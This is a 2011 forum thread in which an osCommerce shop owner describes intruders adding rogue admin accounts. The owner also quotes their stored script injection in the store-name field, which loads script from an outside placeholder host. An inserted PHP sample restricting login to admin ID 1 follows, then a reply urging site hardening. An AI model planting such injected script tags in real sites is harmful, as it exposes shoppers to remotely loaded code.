Medworks, posted August 12, 2011:

Those damn hackers! Day after day after day after day it's the same thing. My administrator counter is a 3 digit number now. What they do is they insert a new administrator with a password of their choice into the admin table, which they have precalculated the md5 code for having a password of their choice, since it is easy to go from the password to the md5 gobbledygook, and then they sign in with that and they are free to wreak any havoc they want.

Another thing they do, by the way, is change my store name in configuration from "Medworks" to something like "Medworks</title><script src=http://blahblahblahblah.com/jquery/></script><title>" so that it loads some horrible thing whenever someone goes to the shopping cart section, or even if it doesn't, just so it tells them the name of the business is Medworks</title><script src=http://blahblahblahblah.com/jquery/></script><title> instead of Medworks.

My webhost REFUSES to let me make the administrator and configuration sections of the SQL read only because they say it would be too much trouble for them, or to grant me the access I would need to do it myself because it is a shared server and that would give me access to meddle with other people's accounts as if I was a parasite who was interested in doing that.

But then I got an idea. The admin ID. MY admin ID is 1. Every time someone generates a new fake admin account, it is assigned 1 higher than the last, unless I set the counter back down. There MUST be some code I can modify within osCommerce that makes it so ONLY an admin with an ID value equal to 1 can get in!
In other words, the way it is now, to sign in as an administrator, one must enter a username which exists in the administrator table, and a password which when fed through the md5 one way function should equal the stored value of password for that administrator, but I want to change it so that one must enter a username which exists in the administrator table, and a password which when fed through the md5 one way function should equal the stored value of password for that administrator, AND the ID number of that administrator is equal to 1! In other words, they can generate fake admins with their passwords until the cows come home, but they're totally useless, they can't use a one of them, since none of them will have an administrator ID of 1 because that will already have been taken by me and my real account! Of course, if they have a way to modify the original administrator ID (and they do, but not necessarily a way to change it to what they want it to be), it wouldn't help them. But if you pointed me to this code, I could perhaps come up with a more clever way to handle this possibility as well. The other possibility is getting it to scramble the password in a different way than it does now, and a method that is not visible to the public, so that their precomputed passwords will not work. They must know how osCommerce computes the md5 scramble because it must be standard, so that they know what to insert. I don't like this idea as much. Does anyone know what code I need to modify so that osCommerce does that?
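The login rule described in the post above, as an added illustration that is not osCommerce's own code: the check accepts only the administrator row whose id is 1, and verifies a salted bcrypt hash rather than an unsalted md5, so that rows an intruder inserts and any precomputed md5 values are both useless. The table and column names, and the sample rows, are assumptions made up for the example.

```php
<?php
// Added illustration, not osCommerce's code: login accepts only admin id 1
// and verifies a salted bcrypt hash instead of an unsalted MD5 value.
// Table name, column names and sample rows are assumptions for this example.
declare(strict_types=1);

const REAL_ADMIN_ID = 1;

function admin_login(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT id, user_name, user_password FROM administrators WHERE user_name = ?'
    );
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;                        // unknown user name
    }
    // Refuse every account except the one real administrator, whatever the
    // password column holds; rows an intruder inserted never pass this check.
    if ((int) $row['id'] !== REAL_ADMIN_ID) {
        return null;
    }
    // password_verify() uses the salt embedded in the bcrypt hash; a legacy
    // md5(password) value stored in the column simply fails to verify.
    if (!password_verify($password, $row['user_password'])) {
        return null;
    }
    return $row;
}

// Detection helper: every row other than id 1 is a row that should not exist.
function rogue_admins(PDO $db): array
{
    $stmt = $db->prepare('SELECT id, user_name FROM administrators WHERE id <> ?');
    $stmt->execute([REAL_ADMIN_ID]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE administrators (id INTEGER PRIMARY KEY, user_name TEXT, user_password TEXT)');
$ins = $db->prepare('INSERT INTO administrators VALUES (?, ?, ?)');
$ins->execute([1, 'sandor', password_hash('correct horse', PASSWORD_BCRYPT)]);
$ins->execute([2, 'intruder', md5('letmein')]);   // constructed: a row an intruder added

var_dump(admin_login($db, 'sandor', 'correct horse') !== null);
var_dump(admin_login($db, 'intruder', 'letmein'));
print_r(rogue_admins($db));
```

The id check only neutralises rows that were added; if the same injection route can overwrite the password column of row 1, the login still falls, which is why the reply below points at closing that route rather than patching the login alone.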
Guest, posted August 12, 2011:

Sandor,

Your problem isn't the hackers.....it's YOU! CLEAN and SECURE your website and the hackers can't get in to create new accounts and corrupt your code. Read and apply the security changes in these two threads: Admin Security and Website Security

Chris